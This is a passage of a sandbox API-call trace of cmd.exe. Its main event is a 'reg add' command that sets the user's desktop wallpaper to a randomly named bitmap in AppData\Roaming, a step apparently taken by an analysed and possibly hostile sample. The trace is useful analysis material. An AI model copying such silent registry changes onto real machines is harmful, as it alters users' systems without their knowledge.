_String2="reg") returned 6 [0200.666] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0200.669] _wcsicmp (_String1="reg", _String2=")") returned 73 [0200.669] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0200.669] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0200.669] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0200.669] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0200.669] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0200.669] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0200.672] _wcsicmp (_String1="reg", _String2=")") returned 73 [0200.672] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0200.672] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0200.672] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0200.672] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0200.672] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0200.672] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0200.673] GetConsoleTitleW (in: lpConsoleTitle=0x115f240, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.674] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0200.674] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0200.674] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0200.674] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0200.674] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0200.674] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0200.674] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0200.674] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0200.674] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0200.674] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0200.674] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0200.674] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0200.674] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0200.674] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0200.674] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0200.674] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0200.674] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0200.674] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0200.674] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0200.674] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0200.674] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0200.674] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0200.674] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0200.674] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0200.674] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0200.674] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0200.674] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0200.674] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0200.674] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0200.674] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0200.674] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0200.675] _wcsicmp (_String1="reg", _String2="START") returned -1 [0200.675] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0200.675] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0200.675] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0200.675] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0200.675] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0200.675] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0200.675] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0200.675] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0200.675] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0200.675] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0200.675] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0200.675] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0200.675] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0200.675] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0200.675] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0200.675] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0200.675] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0200.675] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0200.675] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0200.675] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0200.675] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0200.675] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0200.675] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0200.675] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0200.675] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0200.675] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0200.675] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0200.675] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0200.675] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0200.675] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0200.675] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0200.675] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0200.675] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0200.675] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0200.675] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0200.676] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0200.676] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0200.676] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0200.676] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0200.676] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0200.676] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0200.676] _wcsicmp (_String1="reg", _String2="START") returned -1 [0200.676] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0200.676] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0200.676] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0200.676] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0200.676] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0200.676] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0200.676] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0200.676] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0200.676] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0200.676] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0200.676] _wcsicmp (_String1="reg", _String2="FOR") returned 12 [0200.676] _wcsicmp (_String1="reg", _String2="IF") returned 9 [0200.676] _wcsicmp (_String1="reg", _String2="REM") returned -6 [0200.676] _wcsnicmp (_String1="reg", _String2="cmd ", _MaxCount=0x4) returned 15 [0200.676] SetErrorMode (uMode=0x0) returned 0x0 [0200.677] SetErrorMode (uMode=0x1) returned 0x0 [0200.677] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1200990, lpFilePart=0x115ed4c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x115ed4c*="Desktop") returned 0x1d [0200.677] SetErrorMode (uMode=0x0) returned 0x1 [0200.677] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0200.677] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.683] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0200.684] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.684] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x115ead8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ead8) returned 0xffffffff [0200.684] GetLastError () returned 0x2 [0200.684] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.684] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x115ead8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ead8) returned 0xffffffff [0200.684] GetLastError () returned 0x2 [0200.684] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.685] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x115ead8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ead8) returned 0x120b4a8 [0200.685] FindClose (in: hFindFile=0x120b4a8 | out: hFindFile=0x120b4a8) returned 1 [0200.685] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x115ead8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ead8) returned 0xffffffff [0200.685] GetLastError () returned 0x2 [0200.685] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x115ead8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ead8) returned 0x120b4a8 [0200.685] FindClose (in: hFindFile=0x120b4a8 | out: hFindFile=0x120b4a8) returned 1 [0200.685] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0200.685] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0200.685] GetConsoleTitleW (in: lpConsoleTitle=0x115efcc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.686] InitializeProcThreadAttributeList (in: lpAttributeList=0x115eef8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x115eedc | out: lpAttributeList=0x115eef8, lpSize=0x115eedc) returned 1 [0200.686] UpdateProcThreadAttribute (in: lpAttributeList=0x115eef8, dwFlags=0x0, Attribute=0x60001, lpValue=0x115eee4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x115eef8, lpPreviousValue=0x0) returned 1 [0200.686] GetStartupInfoW (in: lpStartupInfo=0x115ef30 | out: lpStartupInfo=0x115ef30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0200.686] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0200.687] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0200.687] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0200.688] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp\" /f ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x115ee80*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp\" /f ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x115eecc | out: lpCommandLine="reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\F7t5Hk0D.bmp\" /f ", lpProcessInformation=0x115eecc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xdfc, dwThreadId=0x224)) returned 1 [0201.764] CloseHandle (hObject=0xa4) returned 1 [0201.764] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0201.764] GetEnvironmentStringsW () returned 0x1209ff8* [0201.764] FreeEnvironmentStringsA (penv="=") returned 1 [0201.764] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0203.284] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x115ee64 | out: lpExitCode=0x115ee64*=0x0) returned 1 [0203.284] CloseHandle (hObject=0xa8) returned 1 [0203.284] _vsnwprintf (in: _Buffer=0x115ef4c, _BufferCount=0x13, _Format="%08X", _ArgList=0x115ee6c | out: _Buffer="00000000") returned 8 [0203.285] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0203.285] GetEnvironmentStringsW () returned 0x120b4a8* [0203.285] FreeEnvironmentStringsA (penv="=") returned 1 [0203.285] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0203.285] GetEnvironmentStringsW () returned 0x120b4a8* [0203.285] FreeEnvironmentStringsA (penv="=") returned 1 [0203.285] DeleteProcThreadAttributeList (in: lpAttributeList=0x115eef8 | out: lpAttributeList=0x115eef8) [0203.285] GetConsoleTitleW (in: lpConsoleTitle=0x115f1e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.286] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0203.286] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0203.286] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0203.286] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0203.286] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0203.286] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0203.286] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0203.286] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0203.286] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0203.286] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0203.286] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0203.286] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0203.286] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0203.286] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0203.286] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0203.286] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0203.286] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0203.287] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0203.287] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0203.287] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0203.287] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0203.287] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0203.287] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0203.287] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0203.287] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0203.287] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0203.287] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0203.287] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0203.287] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0203.287] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0203.287] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0203.287] _wcsicmp (_String1="reg", _String2="START") returned -1 [0203.287] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0203.287] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0203.287] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0203.287] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0203.287] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0203.287] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0203.287] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0203.287] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0203.287] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0203.287] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0203.287] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0203.287] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0203.287] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0203.287] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0203.287] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0203.287] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0203.287] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0203.288] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0203.288] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0203.288] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0203.288] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0203.288] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0203.288] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0203.288] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0203.288] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0203.288] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0203.288] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0203.288] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0203.288] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0203.288] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0203.288] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0203.288] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0203.288] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0203.288] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0203.288] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0203.288] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0203.288] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0203.288] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0203.288] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0203.288] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0203.288] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0203.288] _wcsicmp (_String1="reg", _String2="START") returned -1 [0203.288] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0203.288] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0203.288] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0203.288] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0203.288] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0203.288] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0203.288] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0203.289] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0203.289] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0203.289] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0203.289] _wcsicmp (_String1="reg", _String2="FOR") returned 12 [0203.289] _wcsicmp (_String1="reg", _String2="IF") returned 9 [0203.289] _wcsicmp (_String1="reg", _String2="REM") returned -6 [0203.289] _wcsnicmp (_String1="reg", _String2="cmd ", _MaxCount=0x4) returned 15 [0203.289] SetErrorMode (uMode=0x0) returned 0x0 [0203.289] SetErrorMode (uMode=0x1) returned 0x0 [0203.289] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1209080, lpFilePart=0x115ecec | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x115ecec*="Desktop") returned 0x1d [0203.289] SetErrorMode (uMode=0x0) returned 0x1 [0203.289] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0203.289] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.290] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.290] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.290] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x115ea78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ea78) returned 0xffffffff [0203.290] GetLastError () returned 0x2 [0203.290] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.290] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x115ea78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ea78) returned 0xffffffff [0203.291] GetLastError () returned 0x2 [0203.291] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.291] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.*", fInfoLevelId=0x1, lpFindFileData=0x115ea78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ea78) returned 0x1200fb8 [0203.291] FindClose (in: hFindFile=0x1200fb8 | out: hFindFile=0x1200fb8) returned 1 [0203.291] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x115ea78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ea78) returned 0xffffffff [0203.291] GetLastError () returned 0x2 [0203.291] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x115ea78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x115ea78) returned 0x1200fb8 [0203.291] FindClose (in: hFindFile=0x1200fb8 | out: hFindFile=0x1200fb8) returned 1 [0203.292] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0203.292] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0203.292] GetConsoleTitleW (in: lpConsoleTitle=0x115ef6c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.293] InitializeProcThreadAttributeList (in: lpAttributeList=0x115ee98, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x115ee7c | out: lpAttributeList=0x115ee98, lpSize=0x115ee7c) returned 1 [0203.293] UpdateProcThreadAttribute (in: lpAttributeList=0x115ee98, dwFlags=0x0, Attribute=0x60001, lpValue=0x115ee84, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x115ee98, lpPreviousValue=0x0) returned 1 [0203.293] GetStartupInfoW (in: lpStartupInfo=0x115eed0 | out: lpStartupInfo=0x115eed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.294] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0203.294] _wcsnicmp (_String1="COPYCMD", 